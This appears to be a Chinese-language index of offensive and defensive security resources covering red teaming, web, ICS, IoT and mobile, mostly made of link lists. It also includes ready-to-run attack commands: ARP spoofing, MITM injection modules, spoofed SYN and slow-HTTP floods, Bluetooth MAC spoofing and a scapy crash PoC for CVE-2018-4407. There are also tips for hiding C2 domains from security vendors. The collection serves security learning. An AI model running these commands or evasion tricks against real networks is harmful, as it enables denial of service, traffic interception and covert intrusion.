蓝队这块,我简单分2种,一种是出了事故的时候叫 事件响应,另一种是暂时没出事故的时候叫 安全建设

事件响应

取证

• 取证

应急

• 应急

分析

• 分析

---

安全建设

• 安全建设

---

RedTeam

综合案例

• 某企业授权渗透报告

• 一星期实战总结（四）

• 一次APT攻击

• 项目实战 | 通过弱口令沦陷校园网

• 记一次红蓝对抗的总结及思考

• 攻防演练中攻击方的思考

• 记一次C/S架构客户端配置文件泄露导致的内网沦陷

---

环境部署

Tips

• vultr 的服务器可以用自己上传的 IOS 镜像, 可以把 kali 直接装到云服务器上. 性价比也比国内的服务器高很多, 登录 vultr 后默认进入 Products, 上面会有个 ISOs, 戳右上角的 Add ISO, 把 kali 官网的 IOS 下载链接复制上去就 OK

相关资源

• bluscreenofjeff/Red-Team-Infrastructure-Wiki

• Mel0day/RedTeam-BCS - BCS（北京网络安全大会）2019 红队行动会议重点内容

• cybersecsi/HOUDINI - Hundreds of Offensive and Useful Docker Images for Network Intrusion. The name says it all.

部署工具

• ffffffff0x/f8x - 红队环境自动化部署工具

• LionSec/katoolin: Automatically install all Kali linux tools - 自动安装所有的 Kali linux 工具

• M507/Kali-TX - 在 kali 上快速部署所需软件的脚本

• rmikehodges/hideNsneak - 通过提供一个界面来快速部署、管理和关闭各种云服务,从而帮助渗透测试人员管理攻击基础架构.这些包括 VM,域前置,Cobalt Strike 服务器,API 网关和防火墙.

• QAX-A-Team/LuWu - 快速在 VPS 部署红队基础设施

• mandiant/commando-vm - 部署 Windows 的渗透测试虚拟机

• t94j0/satellite - 部署一个容易使用 payload 的主机

• fuzz-security/VpsEnvInstall - 一键部署渗透 VPS

• Coalfire-Research/Red-Baron

• supr4s/VPS-web-hacking-tools

文件服务

• 文件传输

云编排

• terraform

  • 使用语法

  • 相关文章

    • Automated Red Team Infrastructure Deployment with Terraform - Part 1

    • Automated Red Team Infrastructure Deployment with Terraform - Part 2

  • 资源

    • Coalfire-Research/Red-Baron

• aws

  • 相关文章

    • Red Team Infrastructure - AWS Encrypted EBS

域名

• https://www.expireddomains.net/ - 抢注过期域名

• https://www.freshdrop.com/

• https://www.domcop.com/

• Tips 想法和 Tips 来自 [Mel0day/RedTeam-BCS]

  1: 不要包含世界大厂和杀毒厂商相关的域名,以及和目标相关的域名
  2: 注册目标相关区域常见的域名,记得开隐私保护
  3: 检查域名是否被分类,金融、医疗、电商、航空、旅游优先
  4: 去VT、微步检查,域名是否被标黑
  5: 举报滥用规则仔细阅读(freenom 慎用)
  
  1: 外网 IP, 通过情报站看是否被标黑
  2: 使用 CDN 隐藏真实 IP(部分安全厂商会拦截 CDN IP)
  
  搭建正常域名,提交至各安全厂商给站点分类
  1: 把域名 A 记录解析到大厂 ip, 使用时候再解析到 C2, 不用时候解析回大厂 ip
  2: VT 自评, alex 自评
  
  subdomain takeover : 高信誉域名 A 解析 B -》
  高信誉肉鸡做前置转发

---

信息收集

• 信息收集

---

LAN-WAN

MITM

相关工具

• LionSec/xerosploit

  • 相关文章

    • xerosploit 用法

  • 安装

    git clone https://github.com/LionSec/xerosploit
    cd xerosploit && python install.py
    1
    ./xerosploit

  • 基本操作

    scan            # 映射你的网络
    iface           # 手动设置网络接口
    gateway         # 手动设置网关
    rmlog           # 删除所有日志

  • 模块演示(部分)

    start
    <靶机IP>
    pscan           # 端口扫描
    run
    
    dos             # dos 攻击
    run
    
    injecthtml      # 将 html 注入到目标访问的网站中
    run
    /root/test.html
    
    injectjs        # 将 javascript 注入到目标网站中
    run
    /root/test.js
    
    rdownload       # 替换目标下载的文件
    run
    exe
    /root/test.exe
    
    sniff           # 嗅探目标的流量
    run

• bettercap/bettercap

• byt3bl33d3r/MITMf

• cain

资源

• Sab0tag3d/MITM-cheatsheet

L2

Arp spoofing

ARP攻击，是针对以太网地址解析协议（ARP）的一种攻击技术，由于主机会信任任何一个 arp 应答, 通过欺骗局域网内访问者 PC 的网关 MAC 地址，使访问者 PC 错以为攻击者更改后的 MAC 地址是网关的 MAC，导致网络不通。

• 相关工具

  • arpspoof

    apt-get install -y dsniff ssldump
    echo 1 > /proc/sys/net/ipv4/ip_forward          # 开启路由功能
    arpspoof -i eth0 -t 192.168.1.91 192.168.1.1    # 进行 arp 欺骗
    driftnet -i eth0                                # 运行 driftnet 截获图片

L3

BGP

• 相关文章

  • 浅析通过操纵BGP Communities影响路由选路

  • 关于BGP安全那些事儿

L4+

DNS劫持

DNS 协议属于 OSI 第七层，DNS 劫持指控制域名解析权限，比如访问 google.com 解析到了 baidu.com 的 IP，比如通过 iframe 打开 google.com

HTTP劫持（内容劫持）

在和网站交互过程中的劫持了请求，比如在右下角出现广告弹窗（插入 js 或 dom）

---

DOS

相关文章

• DDoS攻防原理及实战

• 创业耗费百万,为何DDoS如此要命Part 1

• Memcached DRDoS攻击趋势分析

• [技术分享]旧瓶装新酒——memcache作为DRDOS反射放大器

• 浅析各类DDoS攻击放大技术

• 反射DDOS攻击防御的一点小想法

• 如何简单的防御syn攻击

• 浅谈拒绝服务攻击的原理与防御 (1) :普通拒绝服务攻击

• 浅谈拒绝服务攻击的原理与防御 (2) :反射型DDOS

• 浅谈拒绝服务攻击的原理与防御 (3) :反射DDOS攻击利用代码

• 浅谈拒绝服务攻击的原理与防御 (4) :新型DDOS攻击 Websocket和临时透镜

• 浅谈拒绝服务攻击的原理与防御 (5) :NTP反射攻击复现

• 浅谈拒绝服务攻击的原理与防御 (7) :用Python和C实现syn flood攻击

• 军备竞赛：DDoS攻击防护体系构建

• CPDoS: Cache Poisoned Denial of Service

• 新的DDoS攻击手法来袭：TCP反射攻击技术分析

• 基于snmp的反射攻击的理论及其实现

• DRDoS预警：WdbRPC与BACnet协议可被反射攻击利用

• 什么是 DDoS 攻击？

• 基于OpenAFS文件系统的反射攻击深度分析

相关工具

• JuxhinDB/synner - 一个由 Rust 编写的 SYN flood DOS 工具

• LOIC

• llaera/slowloris.pl - perl 语言写的 dos 脚本

• locustio/locust - python 写的 ddos 工具

• fatih4842/aSYNcrone - 一个 SYN Flood DDoS 工具

• ajmwagar/lor-axe - 多线程、低带宽消耗的 HTTP DoS 工具

• LimerBoy/Impulse - DoS 攻击工具包

• rakyll/hey

• Hping3

  hping3 -I eth0 -a 192.168.100.1 -S 192.168.100.254 -p 80 -i u1000  # 发起大量 SYN 连接,伪造源地址为 192.168.100.1,并使用1000微秒的间隔发送各个 SYN 包.

• licyun/ddos-tools - udp flood 和 cc 类型 DDOS工具集合

• Leeon123/CC-attack - Using Socks4/5 or http proxies to make a multithreading Http-flood/Https-flood (cc) attack.

加固防御

• DDOS介绍与防御建议

• Linux 下防御 DDOS 攻击的操作梳理

• 一点建议,不要在主机层面上下大功夫,上云,上 CDN,加钱,才是最好的解决办法.

HTTP慢速攻击

• HTTP慢速拒绝服务攻击

• 慢速DDoS攻击

• Slow HTTP DOS

• shekyan/slowhttptest - 应用层 DoS 攻击模拟器

  # slowloris模式：
  slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://host.example.com/index.html -x 24 -p 3
  # slow post模式：
  slowhttptest -c 3000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://host.example.com/loginform.html -x 10 -p 3
  # slow read模式：
  slowhttptest -c 8000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u https://host.example.com/resources/index.html -p 3

---

CDN

缓存投毒

相关文章

• 对缓存投毒的学习总结

• Web cache poisoning

• Practical Web Cache Poisoning

  • 实战Web缓存投毒（上）

• Web Cache Entanglement: Novel Pathways to Poisoning

  • 实战Web缓存投毒（下）

• Cache Poisoning at Scale

相关靶场

• Exploiting cache design flaws

CTF Writeup

• 通过一道题了解缓存投毒和SVG XSS

流量放大

相关文章

• CDN安全小结

• CDN流量放大攻击思路

---

OS安全

漏洞记录

• OS-Exploits

Linux

• Linux安全

---

windows

• Windows安全

---

Web安全

综合案例

• 跟心仪的妹子玩游戏误入博彩APP，顺手破了个案

• 对某网的一次渗透测试纪实

• 全程带阻：记一次授权网络攻防演练（上）

• 全程带阻：记一次授权网络攻防演练（下）

• 记录一次某客户系统的漏洞挖掘

• 记一次对某企业的渗透测试实战

• Flexport今年在Hackerone被报告的6个有趣的漏洞

• 记一次曲折而又有趣的渗透

• Attacking HelpDesks Part 1: RCE Chain on DeskPro, with Bitdefender as a Case Study

• 又一个登录框引起的血案

• RCE in Google Cloud Deployment Manager

• 入侵钓鱼站并溯源

• 授权渗透一个asp站点

• 授权测试一个java网站

• 记一次某大学渗透过程

• 攻防纪实｜从任意文件下载到命令执行

• 记一次前端安全测试

• 某平台的一次简单渗透测试记录

• 记一次校园内网的edusrc漏洞挖掘

• 记一次edu漏洞挖掘——从信息泄露到内网滲透

• 前端JavaScript渗透测试步步为营

相关文章

• 谈谈对后台登录页面的渗透测试

• Export Injection

• 漏洞组合拳打法

多种工具组合进行挖掘的案例

• How I Found multiple SQL Injection with FFUF and Sqlmap in a few minutes

靶场

• DVWA - 大名鼎鼎的 DVWA 靶场,新手入门培训必做实验项目

  • DVWA-WalkThrough

• pikachu - 非常优秀的 web 基础靶场,与 dvwa 相比 dvwa 更适合教学,pikachu 漏洞种类更多,建议通关顺序 dvwa --> pikachu

  • pikachu-WalkThrough

• sqli-labs - 非常全面的 SQL 注入靶场,必学

  • sqli-labs-WalkThrough

• upload-labs - 一个总结了各种类型文件上传漏洞的靶场

  • upload-labs-WalkThrough

• XSS挑战 - 学习 XSS 相关知识的靶场

  • XSS挑战-WalkThrough

• XVWA - 相比之 DVWA,漏洞种类更丰富一些

  • XVWA-WalkThrough

Checklist

• AboutSecurity/Checklist.zh-cn.md - 渗透测试检查项

网站资产嗅探

• 网站资产嗅探 - 网站信息收集的方法汇总

---

前端攻防

• 前端攻防

---

BS-Exploits

CMS / 中间件框架 / 组件 / 服务漏洞

• BS-Exploits

---

Web_Generic

Web通用漏洞

• Web_Generic

---

IDOR

逻辑类漏洞

IDOR学习起来容易上手,平常挖的也比较多,而且这个可以说不仅仅只是在 web 的层面上,你可以将其运用到挖 CS 方面的逻辑漏洞,挖各类奇奇怪怪的形式的逻辑漏洞,学好了,性价比极高

• IDOR

---

Web_Tricks

HTTP_request_smuggling

http 请求走私

由于各种各样的原因, 各网站通常使用多级代理模式对外开放 Web 服务, 如 CDN、Nginx 代理等。HTTP/1.1 版本倾向于使用 keep-alive 长连接进行通信, 提高前后端之间的通讯效率。也就是说多个人的流量可能会在前后端之间的同一个 tcp 会话中传输, 另外前后端对于 Content-Length 和 Transfer-Encoding 的解析处理方法不同, 有可能造成请求污染的情况，直接导致 HTTP Smuggling 攻击的出现。

• HTTP_request_smuggling

---

滥用 HTTP hop by hop

相关文章

• 从滥用HTTP hop by hop请求头看CVE-2022-1388

• Abusing HTTP hop-by-hop request headers

---

JWT安全

JSON Web Token

• JWT安全

OOB

带外通道技术

在渗透中，经常碰到关闭回显的漏洞，常见的 XXE 盲注，SQL 盲注，反序列号无回显，这个时候常用到 OOB 带外数据通道，带外通道技术（OOB）让攻击者能够通过另一种方式来确认和利用所谓的盲目（blind）的漏洞。在这种盲目的漏洞中，攻击者无法通过恶意请求直接在响应包中看到漏洞的输出结果。带外通道技术通常需要脆弱的实体来生成带外的 TCP/UDP/ICMP 请求，然后，攻击者可以通过这个请求来提取数据。一次 OOB 攻击能够成功逃避监控，绕过防火墙且能更好的隐藏自己。

• OOB

绕过访问

• 绕过访问

---

安防设备

相关文章

• 下一座圣杯 - 2019

• 安全产品的灯下黑

安全产品默认口令

• 网络安全产品默认口令

Bypass

• Bypass技巧

漏洞利用

• SecDevice-Exploits

---

后渗透

• 后渗透

---

云安全

• 云基础组件安全

  • Docker

  • Kubernetes

• 公有云安全

---

软件服务安全

漏洞记录

• CS-Exploits

• DesktopApps-Exploits

---

协议安全

注:本分类里内容并非全是协议的 bug,部分 "基于、使用" 这个协议的应用所存在的漏洞也算在其中,例如 dns 域传送漏洞,其并非 dns 协议本身的漏洞,为服务部署时的配置问题,但应用与 DNS 相关的业务,故此分类,特此说明

漏洞记录

• Protocol-Exploits

---

语言安全

• 语言安全

---

ICS

工控系统的概念

工业控制系统(Industrial Control Systems,ICS,简称工控系统),是由各种自动化控制组件以及对实时数据进行采集、监测的过程控制组件共同构成的确保工业基础设施自动化运行、过程控制与监控的业务流程管控系统。其核心组件包括数据采集与监控系统(Supervisory Control and Data Acquisition,SCADA)、分布式控制系统(Distributed Control Systems,DCS)、可编程控制器(Programmable Logic Controller,PLC)、远程终端(Remote Terminal Unit,RTU)、人机交互界面设备(Human Machine Interface,HMI),以及确保各组件通信的接口技术。

漏洞库

• 工控系统行业漏洞库平台

• 工控系统行业漏洞

资源

• ITI/ICS-Security-Tools - 用于探索 ICS 安全性的工具，技巧，窍门等

• w3h/icsmaster - ICS/SCADA Security Resource（整合工控安全相关资源）

• hslatman/awesome-industrial-control-system-security - 与工业控制系统（ICS）安全相关的资源的精选列表。

相关文章

• 探究卫星有关的安全问题

• 卫星安全研究有关的基础知识

• 工控安全从入门到实战——概述（一）

• 工控安全入门之攻与防

• 工控安全标准溯源与入坑指引

• 工控系统安全测试用例

• 工控安全入门分析 路人甲

• 工控学习路径

• 【工控安全】从固件逆向看工控安全

CTF writup

• 工业信息安全技能大赛

  • CTF工业信息安全大赛实践与分析

  • 2019工业信息安全技能大赛个人线上赛第一场writeup

• 中能融合杯

  • “中能融合杯”全国第六届工控系统信息安全攻防竞赛Wp

• ICSC2020 工业信息安全技能大赛

  • ICSC2020 工业信息安全技能大赛WriteUp

• 之江杯

  • 之江杯2020工控题目 Write Up

• CISCN2021

  • CISCN2021 HMI 工控

  • CISCN2021 HMIControl

SCADA默认口令

• scadastrangelove/SCADAPASS - SCADA StrangeLove 默认/硬编码密码列表

工控资产嗅探

• 工控环境信息收集

---

工控协议

• 工控协议

---

工控流量

pacp 资源

• automayt/ICS-pcap - 各类工控的 pcap 包

• ICS-Security-Tools/pcaps - 各类工控的 pcap 包

相关文章

• 深度解析工控网络流量特点 - 文章通过深入解析工控流量的字段，来探寻工控流量的特点。

分析实战

• Wireshark S7Comm 抓包记录 - 记录有关 S7Comm 的请求响应包

• Wireshark Ethernet/IP 抓包记录 - 记录有关 Ethernet/IP 的请求响应包

---

PLC攻击

• PLC攻击

---

上位机安全

• 上位机安全

---

IOT

无线电安全

Bluetooth

相关文章

• 如何破解蓝牙打开监狱大门：黑客主义行动力（5）

• bluescan：一个强大的蓝牙扫描器

相关工具

• btscanner - 蓝牙扫描器

  apt install -y btscanner   # 安装
  btscanner
      # 选择 “i” 以启动查询扫描
      # 选择 “b” 以启动爆破扫描

• fO-000/bluescan - 蓝牙扫描器

  # 安装依赖
  sudo apt install python3-pip python3-dev libcairo2-dev libgirepository1.0-dev libbluetooth-dev libdbus-1-dev bluez-tools python3-bluez
  pip3 install bluescan
  
  bluescan -m br      # BR 设备扫描
  bluescan -m le      # LE 设备扫描
  bluescan -m sdp     # SDP 服务扫描
  bluescan -m lmp     # LMP 特性扫描
  bluescan -m gatt    # GATT 服务扫描

• spooftooph

  spooftooph -i hci0 -a A0:02:DC:11:4F:85 -n Car537
  # -i 指定设备，在这种情况下为 hci0
  # -a 指定要欺骗的MAC地址
  # -n 指定要欺骗的设备名，在这种情况下为 “Car537”
  hciconfig hci0 name

---

RFID

RFID基础知识

• RFID基础知识

---

wifi

频段与信道

• 三种常见的无线频段

  2.4 GHz,3.6 GHz,5 GHz

• 每个频段都有一组允许的频率范围

  • 2.4 GHz(2400-2495)

  • 5 GHz(5180-5825)

  这些信道被分成多个频段,每个频段只能使用有限的几个信道

• 2.4GHz 802.11b/g/n 频段被分成多个信道,其对应频率关系如下

  信道	频率
  1	2412
  2	2417
  3	2422
  4	2427
  5	2432
  6	2437
  7	2442
  8	2447
  9	2452
  10	2457
  11	2462
  12	2467
  13	2472
  14	2484

• 5 GHz 802.11a/c 频段可以具有 7 到 165 个信道以及它们各自的信道的频率范围从 5035 至 5825

  信道	频率
  7	5035
  8	5040
  9	5045
  11	5055
  12	5060
  16	5080
  32	5160
  34	5170
  36	5180
  38	5190
  40	5200
  42	5210
  44	5220
  46	5230
  48	5240
  50	5250
  52	5260
  54	5270
  56	5280
  58	5290
  60	5300
  62	5310
  64	5320
  68	5340
  96	5480
  100	5500
  102	5510
  104	5520
  106	5530
  108	5540
  110	5550
  112	5560
  114	5570
  116	5580
  118	5590
  120	5600
  122	5610
  124	5620
  126	5630
  128	5640
  132	5660
  134	5670
  136	5680
  138	5690
  140	5700
  142	5710
  144	5720
  149	5745
  151	5755
  153	5765
  155	5775
  157	5785
  159	5795
  161	5805
  165	5825
  169	5845
  173	5865
  183	4915
  184	4920
  185	4925
  187	4935
  188	4940
  189	4945
  192	4960
  196	4980

  具体详见: https://en.wikipedia.org/wiki/List_of_WLAN_channels

无线安全协议

• WEP

  使用流密码 RC4 来确保机密性,很不安全

  • 由于初始化向量的熵大小较弱,因此有可能对密钥进行猜测攻击

  • 此安全协议的另一个缺陷是完整性检查,它可以使攻击者伪造数据包并生成 IV

  • 可以针对此安全性进行攻击的类型主要有两种:ChopChop 和 Fragmentation 攻击;两种攻击的主要目的是检索 PRGA 并将数据包伪造回接入点

• WPA2

  WPA2 PSK 相比 WEP 更安全,主要用于家庭路由器

  • 变体：WPA TKIP,WPA2 AES,WPA2 TKIP + AES

  • TKIP - 时间密钥完整性协议

  • 64位消息完整性检查(MIC)L

  • 为了防止简单的重放攻击,使用了序列计数器(TSC),该计数器仅允许数据包按顺序到达接收器

  • AES - 高级加密标准

  • 可以捕获客户端和访问点之间的身份验证握手

  • WPA2 仍然容易受到爆破攻击

• WPA2 Enterprise(企业)

  • 使用身份验证服务器控制对无线网络的访问

  • 客户端需要通过身份验证服务器进行自我验证

  • 利用证书颁发机构来验证用户的合法性

  • 无线网络的接入点与最弱的用户一样强大(The access point to wireless network is as strong as the weakest users)

  • 可以通过 Evil Twin WPA2 Enterprise 网络对 CA 配置错误的访问点进行攻击,并捕获质询和响应

• WPS

  WPS - WiFi 保护设置主要用于路由器和客户端之间,以更快地建立连接

  • 如果配置错误,很容易被入侵

  • 仅包含8位数字,在身份验证期间,将8位数字分为2部分,并且每4位一次验证,4位数字可以被10000次尝试爆破出来

相关工具

• Aircrack

  • Aircrack 笔记

相关资源

• conwnet/wpa-dictionary - WPA/WPA2 密码字典，用于 wifi 密码暴力破解

---

硬件安全

漏洞记录

• Device-Exploits

HID

HID 全称为 Human Interface Device 直译为人类接口设备，也被称为人体学输入设备，是指与人类直接交互的计算机设备，而 pc 端上的”HID”一般指的是 USB-HID 标准，更多指微软在 USB 委员会上提议创建的一个人体学输入设备工作组。HID attack 通过插入带有攻击向量的USB设备等方式，恶意代码直接就被加载执行，攻击操作也就瞬时发生。此类方式属于物理层面攻击。

BadUSB

BADUSB 是2014年黑客大会上由柏林 SRLabs 的安全研究人员 JakobLell 和独立安全研究人员 Karsten Nohl 展示攻击方法，该攻击方法通过对普通u盘的固件进行逆向重新编程，修改了u盘的系统，然后进行攻击。

• 低成本玩转硬件安全（一）：BadUSB on Arduino

• BadUSB插谁谁怀孕

• 插入U盘自动攻击：BadUSB原理与实现

Digispark

Digispark 是一个基于 ATTINY85 微控制器的 USB 开发板，体积小且价钱便宜，功能方面则没有 Arduino 般强大。代码与 Arduino 大同小异，更可贵的是使用 Arduino IDE 来开发。

• HID-Digispark

USB-Rubber-Ducky

USB RUBBER DUCKY 简称 usb 橡皮鸭，是最早的按键注入工具，可根据对应要求定制硬件。

• 利用USB RUBBER DUCKY（USB 橡皮鸭）在目标机器上启动Empire或Meterpreter会话

• hak5darren/USB-Rubber-Ducky

Teensy

Teensy 是拥有芯片且功能完整的单片机开发系统。可模拟键盘和鼠标。经开发的 teensy usb 设备可被电脑识别成键盘或鼠标，然后执行编程进去的恶意代码。价格亲民，开源性强可和kali配合使用。

• 关于HID攻击介绍

• HID攻击之TEENSY实战

USBkiller

• USB killer

• This $3 DIY USB Device Will Kill Your Computer

USBKeylogger

一个基于 ESP8266+CH9350 的键盘记录器，且带有 Wi-Fi 功能，可以存储记录到的键盘输入，并可以通过其发出的 Wi-Fi 网络，在手机端查看记录到的用户键入数据。

• HID-USBKeylogger

USBHarpoon

通过USBHarpoon，安全专家用充电线取代了USB驱动器，由于充电线太过常见且运用频繁，所以用户可能会对其放松警惕，攻击也就更容易顺利实现。

• HID-USBHarpoon

---

固件安全

• 固件安全

---

IIOT

自动化

相关案例

• 格物实验室：KUKA 机器人安全分析实战

CAN

安全资源

• jaredthecoder/awesome-vehicle-security

• newaetech/CANoodler

相关文章

• 如何使用Metasploit进行汽车安全性测试？

• 物联网安全实战从零开始-CAN总线协议初探

• Hacking All The Cars之CAN总线逆向

仿真工具

• zombieCraig/ICSim - ICSim 可以产生多个CAN信号，同时会产生许多背景噪声，让我们可以在没有汽车或不改造汽车的情况下即可练习CAN总线的逆向技术。ICSim 包括一个带有车速表、门锁指示灯、转向信号灯和控制面板的仪表板。模拟控制器允许用户与模拟汽车网络进行交互，应用加速、刹车、控制门锁和转向信号。

通信工具

• linux-can/can-utils - Can-utils 是一组 Linux 实用程序，允许 Linux 与车载 CAN 网络进行通信。

  apt install can-utils

• CANToolz/CANToolz - Black-box CAN network analysis framework

• collin80/SavvyCAN - QT based cross platform canbus tool

• dschanoeh/Kayak - Kayak is a CAN bus analysis tool based on SocketCAN

---

MobileSec

移动安全这块内容我不是很懂,稍微收集一些,可能分类不准确

相关工具

• MobSF/Mobile-Security-Framework-MobSF - 一个自动化的、一体化的移动应用程序(安卓/iOS/Windows)测试、恶意软件分析和安全评估框架，能够执行静态和动态分析。

  注: 安装的时候不能走国内 pip 源,特别是清华源,会直接报错

Android

• Android安全

IOS

CVE-2018-4407

• 相关文章

  • 远程打挂所有的 apple 设备 — CVE-2018-4407 分析

• POC | Payload | exp

  $scapy
  >>send(IP(dst="192.168.1.151",options=[IPOption("A"*8)])/TCP(dport=8888,options=[(19, "1"*33)]))

小程序安全

• 小程序安全